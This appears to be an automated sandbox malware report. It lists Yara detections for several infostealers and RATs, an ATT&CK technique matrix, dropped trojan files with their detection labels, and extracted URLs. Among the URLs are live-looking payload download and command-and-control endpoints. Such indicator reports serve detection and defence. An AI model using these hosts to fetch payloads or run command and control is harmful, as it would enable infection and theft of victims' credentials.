Source: Yara match	File source: 16.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.436080.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.2055908255.00000000009B2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2581111095.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2377213784.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2010973024.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2186619176.0000000000421000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gold.exe PID: 1072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: u3uP67496d.exe PID: 7600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: penis.exe PID: 4764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: crypted.exe PID: 5452, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\u3uP67496d.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\newbundle2[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 23.2.needmoney.exe.312a4b9.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.needmoney.exe.3710000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.needmoney.exe.3740000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.needmoney.exe.3710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.stealc_default2.exe.ed0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.stealc_default2.exe.ed0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.needmoney.exe.312a4b9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.needmoney.exe.3740000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000002.2707762608.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2318326891.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2261123132.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2323134391.0000000000ED1000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.2088515827.0000000000ED1000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2260770680.0000000003710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 4512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 3708, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\stealc_default2[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 4512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 3708, type: MEMORYSTR

Yara detected Zhark RAT

Source: Yara match	File source: 00000020.00000002.3818833176.0000000002968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 6412, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 24.0.penis.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	221 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 DLL Side-Loading	512 Process Injection	11 Deobfuscate/Decode Files or Information	11 Input Capture	3 File and Directory Discovery	Remote Desktop Protocol	4 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Scheduled Task/Job	5 Obfuscated Files or Information	Security Account Manager	347 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	1 Install Root Certificate	NTDS	1 Query Registry	Distributed Component Object Model	11 Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	Network Logon Script	13 Software Packing	LSA Secrets	1091 Security Software Discovery	SSH	2 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	3 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	471 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	471 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	512 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	55%	ReversingLabs	Win32.Packed.Themida
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\acentric[1].exe	100%	Avira	TR/Spy.Agent.bvpeh
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Blenar[1].exe	100%	Avira	HEUR/AGEN.1312961
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\crypted[1].exe	100%	Avira	HEUR/AGEN.1357677
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\2[1].exe	100%	Avira	TR/Drop.Agent.fgswh
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\stealc_default2[1].exe	100%	Avira	TR/AD.Stealc.pegov
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\rstxdhuj[1].exe	100%	Avira	HEUR/AGEN.1358803
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\66ed86be077bb_12[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\splwow64[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Nework[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\stealc_default2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\rstxdhuj[1].exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\2[1].exe	42%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Nework[1].exe	96%	ReversingLabs	Win32.Trojan.Multiverze
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\acentric[1].exe	71%	ReversingLabs	Win32.Trojan.Acll
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\rstxdhuj[1].exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeKeylogger
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\splwow64[1].exe	79%	ReversingLabs	Win32.Trojan.Znyonm
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\2[1].exe	83%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\crypted[1].exe	96%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\newbundle2[1].exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\stealc_default2[1].exe	96%	ReversingLabs	Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\12dsvc[1].exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\66ed86be077bb_12[1].exe	55%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Blenar[1].exe	24%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\JavvvUmar[1].exe	50%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe	83%	ReversingLabs	Win32.Trojan.Whispergate
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\LummaC222222[1].exe	66%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\gold[1].exe	100%	ReversingLabs	ByteCode-MSIL.Trojan.Seraph
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\needmoney[1].exe	96%	ReversingLabs	Win32.Trojan.Stealc
C:\Users\user\AppData\Local\QuantumDynamics Lab\QuantumFlow.scr	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	96%	ReversingLabs	Win32.Trojan.Multiverze
C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	100%	ReversingLabs	ByteCode-MSIL.Trojan.Seraph
C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	96%	ReversingLabs	Win32.Trojan.Multiverze
C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	50%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	96%	ReversingLabs	Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	96%	ReversingLabs	Win32.Trojan.Stealc
C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	83%	ReversingLabs	Win32.Trojan.Whispergate
C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	71%	ReversingLabs	Win32.Trojan.Acll
C:\Users\user\AppData\Local\Temp\1000285001\2.exe	83%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT
C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	79%	ReversingLabs	Win32.Trojan.Znyonm
C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	96%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe	66%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe	55%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1000321001\2.exe	42%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Temp\1000340001\Blenar.exe	24%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeKeylogger
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	55%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\607698\Waters.pif	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\svchost015.exe	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\wZcULqdrBkDQvQgfGRYD.dll	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\d3d9.dll	61%	ReversingLabs	Win32.Trojan.Midie

Name	Malicious	Antivirus Detection	Reputation
lootebarrkeyn.shop	true
http://91.202.233.158/e96ea2db21fa9a1b.php	true
@sevtvf17vt.top	true
analforeverlovyu.top	true
https://solutionhub.cc:443/socket/	true

URLs from Memory and Binaries

Name	Source	Malicious
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q	needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id23ResponseD	RegAsm.exe, 0000000C.00000002.2220091098.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.000000000317C000.00000004.00000800.00020000.00000000.sdmp	false
http://91.202.233.158/3836fd5700214436/msvcp140.dll	svchost015.exe, 0000001D.00000002.2707762608.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/	RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id2Response	RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false
http://www.x-ways.net/winhex/subscribe-d.htmlU	needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2232110837.0000000000401000.00000020.00000001.01000000.0000001C.sdmp	false
http://185.215.113.117/inc/needmoney.exeI	axplong.exe, 00000009.00000002.3830428963.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000003.2664280085.0000000000E46000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id21Response	RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://103.130.147.211/Files/2.exe	axplong.exe, 00000009.00000002.3830428963.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000003.2664280085.0000000000E46000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.117/inc/gold.exe	axplong.exe, 00000009.00000002.3830428963.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wsat	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
https://garageserviceoperation.com:443/socket/?i	aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	false
https://solutionhub.cc:443/socket/?id=socket/	aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9	RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false
http://sevtvf17vt.top/v1/upload.php	JavvvUmar.exe, 0000001C.00000003.3097661602.00000000013D4000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
https://api.ip.sb/ip	penis.exe, 00000018.00000002.2227774761.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, crypted.exe, 00000024.00000002.2377213784.0000000003B95000.00000004.00000800.00020000.00000000.sdmp	false
https://garageserviceoperation.com:443/socket/?id=H	aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	false
https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection	needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2232110837.0000000000401000.00000020.00000001.01000000.0000001C.sdmp	false
https://www.leopardi.nl/frm/_vti_cnf/Blenar.exe	axplong.exe, 00000009.00000002.3830428963.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000003.2664280085.0000000000E46000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id24Response	RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, JavvvUmar.exe, 0000001C.00000003.2400838500.0000000003282000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000003.2384713254.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
https://solutionhub.cc:443/socket/?id=socket/1y	aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.16/dobre/splwow64.exe	axplong.exe, 00000009.00000002.3830428963.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000003.2664280085.0000000000E46000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.117/inc/needmoney.exey	axplong.exe, 00000009.00000002.3830428963.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000003.2664280085.0000000000E46000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false
https://garageserviceoperation.com:443/socket/?id=heckup6	aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	false
https://garageserviceoperation.com:443/socket/?id=l	aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.phpB	stealc_default2.exe, 00000015.00000002.2318326891.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id10ResponseD	RegAsm.exe, 0000000C.00000002.2220091098.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E87000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/inc/2.exe2Cm	axplong.exe, 00000009.00000002.3830428963.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id5Response	RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id15ResponseD	RegAsm.exe, 0000000C.00000002.2220091098.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.000000000317C000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id10Response	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/inc/2.exe	axplong.exe, 00000009.00000002.3830428963.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id8Response	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpo	Hkbsse.exe, 00000016.00000002.3821765815.000000000134A000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.phpN	stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2318326891.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpt	Hkbsse.exe, 00000016.00000002.3821765815.000000000134A000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	false
https://solutionhub.cc:443/socket/443/socket/	aspnet_regiis.exe, 00000020.00000002.3818833176.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.phpa	stealc_default2.exe, 00000015.00000002.2318326891.00000000008B9000.00000004.00000020.00020000.00000000.sdmp	false
http://91.202.233.158/3836fd5700214436/nss3.dllU2Ll	svchost015.exe, 0000001D.00000002.2707762608.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.26/Dem7kTu/index.phpx	Hkbsse.exe, 00000016.00000002.3821765815.000000000134A000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.phpc	stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	false
